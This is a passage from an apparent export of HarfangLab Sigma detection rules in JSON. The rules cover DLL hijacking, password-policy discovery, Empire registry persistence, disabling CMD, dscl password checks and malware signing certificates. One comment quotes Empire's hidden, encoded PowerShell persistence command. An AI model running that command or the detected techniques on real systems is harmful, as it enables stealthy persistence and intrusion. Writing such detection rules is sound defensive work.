'?:\\Program Files\\pandora_agent\\util\\pandora_hardening.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n exclusion_defender:\n GrandparentImage: 
'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine|contains|all:\n - ' -Command & {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('\n - '[System.IO.FileMode]::Open, [System.IO.FileAccess]::Read'\n - '::Read);$calculatedHash = Get-FileHash'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\'\n\n exclusion_defender_no_parent:\n CurrentDirectory:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\'\n IntegrityLevel: 'System'\n\n exclusion_wazuh:\n GrandparentImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eda4c668-8c9e-41ea-801f-e3bd359382b4",
"rule_name": "Password Policy Discovered via net accounts",
"rule_description": "Detects the execution of net.exe to discover the local accounts configuration, including password policy configuration.\nThis activity may indicate a potential security threat or malicious behavior.\nIt is recommended to investigate the parent processes for other suspicious activities.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1201"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "edbcd2f2-a49b-47c3-818f-df7d306a6041",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077292Z",
"creation_date": "2026-03-23T11:45:34.077294Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_deploymentcsphelper.yml",
"content": "title: DLL Hijacking via deploymentcsphelper.exe\nid: edbcd2f2-a49b-47c3-818f-df7d306a6041\ndescription: |\n Detects potential Windows DLL Hijacking via deploymentcsphelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\deploymentcsphelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "edbcd2f2-a49b-47c3-818f-df7d306a6041",
"rule_name": "DLL Hijacking via deploymentcsphelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via deploymentcsphelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ede63422-8007-49b4-a36f-8bfc8a82cc7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076698Z",
"creation_date": "2026-03-23T11:45:34.076700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076704Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/registry.py",
"https://medium.com/@brsdncr/forensic-investigation-operations-windows-base-iii-64a7afec9f69",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_empire_powershell_registry_elevated_persistence.yml",
"content": "title: PowerShell Empire Elevated Registry Persistence Added\nid: ede63422-8007-49b4-a36f-8bfc8a82cc7c\ndescription: |\n Detects suspicious registry persistence entries in the local machine software hive that are related to the Empire attack framework.\n Empire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent.\n It is recommended to investigate the process that set the registry value for suspicious activities, as well as to look at the registry modification to understand the objective of this persistence.\nreferences:\n - https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/registry.py\n - https://medium.com/@brsdncr/forensic-investigation-operations-windows-base-iii-64a7afec9f69\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/10/14\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1547.001\n - attack.t1059.001\n - attack.t1112\n - attack.s0363\n - classification.Windows.Source.Registry\n - classification.Windows.Framework.Empire\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*'\n\n # by default, this is \"Updater\" value with this content:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x=$((gp HKLM:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x\"\n selection_variant1:\n TargetObject|endswith: 'Updater'\n Details|contains: 'powershell -Win Hidden -enc '\n selection_variant2:\n Details|contains|all:\n - '((gp '\n - 'powershell -Win Hidden -enc '\n\n condition: selection and 1 of selection_variant*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ede63422-8007-49b4-a36f-8bfc8a82cc7c",
"rule_name": "PowerShell Empire Elevated Registry Persistence Added",
"rule_description": "Detects suspicious registry persistence entries in the local machine software hive that are related to the Empire attack framework.\nEmpire is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent.\nIt is recommended to investigate the process that set the registry value for suspicious activities, as well as to look at the registry modification to understand the objective of this persistence.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "edfb92d9-828d-42c7-8a38-430fe250a841",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078760Z",
"creation_date": "2026-03-23T11:45:34.078762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078767Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_filescrn.yml",
"content": "title: DLL Hijacking via filescrn.exe\nid: edfb92d9-828d-42c7-8a38-430fe250a841\ndescription: |\n Detects potential Windows DLL Hijacking via filescrn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'filescrn.exe'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "edfb92d9-828d-42c7-8a38-430fe250a841",
"rule_name": "DLL Hijacking via filescrn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via filescrn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee3dd02e-2672-4db4-bb60-1bc934cf1de4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621457Z",
"creation_date": "2026-03-23T11:45:34.621458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621463Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_cmd.yml",
"content": "title: CMD Disabled\nid: ee3dd02e-2672-4db4-bb60-1bc934cf1de4\ndescription: |\n Detects the disabling of the Windows Command Prompt (CMD) for a given user.\n Attackers can use this registry modification to prevent users from starting CMD, either to hide malicious payloads or to prevent users from killing them.\n It is recommended to check whether the process modifying the registry keys has a legitimate reason to do so.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableCMD'\n Details|contains: 'DWORD'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_userlock:\n ProcessOriginalFileName: 'UlAgent.dll'\n ProcessSignature: 'IS Decisions SA'\n\n 
condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee3dd02e-2672-4db4-bb60-1bc934cf1de4",
"rule_name": "CMD Disabled",
"rule_description": "Detects the disabling of the Windows Command Prompt (CMD) for a given user.\nAttackers can use this registry modification to prevent users from starting CMD, either to hide malicious payloads or to prevent users from killing them.\nIt is recommended to check whether the process modifying the registry keys has a legitimate reason to do so.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee42a801-9d93-4038-8e24-6e79ef2d85bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095781Z",
"creation_date": "2026-03-23T11:45:34.095783Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_conhost.yml",
"content": "title: DLL Hijacking via CONHOST.exe\nid: ee42a801-9d93-4038-8e24-6e79ef2d85bc\ndescription: |\n Detects potential Windows DLL Hijacking via CONHOST.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONHOST.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msctf.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee42a801-9d93-4038-8e24-6e79ef2d85bc",
"rule_name": "DLL Hijacking via CONHOST.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CONHOST.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee43664e-b49f-4bb1-94c6-9e4cde2134fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094855Z",
"creation_date": "2026-03-23T11:45:34.094857Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094861Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1078/001/",
"https://attack.mitre.org/techniques/T1078/002/",
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1087_001_dscl_password_validation.yml",
"content": "title: Users Password Validation via dscl\nid: ee43664e-b49f-4bb1-94c6-9e4cde2134fa\ndescription: |\n Detects suspicious password validation using dscl.\n Adversaries may use dscl to validate gathered users' passwords.\n It is recommended to check the process launching dscl for malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1078/001/\n - https://attack.mitre.org/techniques/T1078/002/\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2024/06/11\nmodified: 2025/08/26\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - attack.t1087.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains:\n - 'dscl /Local/Default authonly '\n - 'dscl /Local/Default -authonly '\n - 'dscl . -authonly '\n - 'dscl . authonly '\n\n exclusion_macoslaps:\n ProcessParentImage: '/usr/local/laps/macOSLAPS'\n\n exclusion_jumpcloud:\n ProcessParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee43664e-b49f-4bb1-94c6-9e4cde2134fa",
"rule_name": "Users Password Validation via dscl",
"rule_description": "Detects suspicious password validation using dscl.\nAdversaries may use dscl to validate gathered users' passwords.\nIt is recommended to check the process launching dscl for malicious behavior.\n",
"rule_creation_date": "2024-06-11",
"rule_modified_date": "2025-08-26",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1087.002",
"attack.t1087.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee61a59b-83ce-42a2-9df8-1e4845d704f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625743Z",
"creation_date": "2026-03-23T11:45:34.625745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://twitter.com/th3_protoCOL/status/1587823143854698497",
"https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
"https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
"https://twitter.com/jaydinbas/status/1646475092006785027",
"https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_image_malicious_certificate.yml",
"content": "title: Image Loaded Signed with Malicious Certificate\nid: ee61a59b-83ce-42a2-9df8-1e4845d704f0\ndescription: |\n Detects loading of an image signed with a certificate that was used by malicious actors.\n This can be indicative of a malicious actor trying to evade EDR/AV solutions with a forged signature.\n It is recommended to analyze the loaded DLL for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://twitter.com/th3_protoCOL/status/1587823143854698497\n - https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - https://twitter.com/jaydinbas/status/1646475092006785027\n - https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/11/17\nmodified: 2025/12/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ImageSignatureSignerThumbprint:\n # https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - '7C496F5FE65803A45AD7BD8DA5F59B8548E08E0A'\n # https://twitter.com/th3_protoCOL/status/1587823143854698497\n - 'FDD415C4B8A6983CFA982ECABB6D9A55BFD9F623'\n # https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass\n - 'F55B2365D9E837777B760305C78E674B686E5834'\n # https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html\n - 'C7939F8303CA22EFFB28246E970B13BEE6CB8043'\n - 
'9E7CE1AED4A1C8A985D76BFCD65AC71BFF75430D'\n # https://twitter.com/pr0xylife/status/1595096438798696448\n - 'AAD723780CD440026A6CA0AA1E9D13D09F877E8F'\n # https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/\n - '68FF94B5C77481CC3AB10A05F3C926711C9C5F93'\n # https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\n - '848C69A831D3789FA2BF6D7A7C8591F80A8F7FCB'\n - 'A8F9B64E4C5CC2AFE5E82DC3C9F44A1BDA2ED4B1'\n - '520CD357E195B57E0BFE7AF87227F4C0737E6BDE'\n - 'DBEB38C344441CB35FF982D1301A1C3DF992E140'\n - '60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3'\n - 'AF5A136DCCED63DEFC29502FEDE9BFF7E2C16A8C'\n - '3A1CE9C2EE30EE8D8883DFC5BF45FF0201C2AB5D'\n # https://twitter.com/ESETresearch/status/1594937059348992001\n - '6EF192CBD6E540F1D740D1BD96317ACAE8C6AF9D'\n # https://twitter.com/SquiblydooBlog/status/1660782805687865344\n - '84F120783C24B1300ADD782414901503AF2F964A'\n # https://twitter.com/jaydinbas/status/1646475092006785027\n - '6ADE753659F5624D5A5D747523F07E23CAD9E65C'\n # https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html\n - '9EEEF1B33142106A095364DD0B2BFC8A24A2A563'\n # https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details\n - 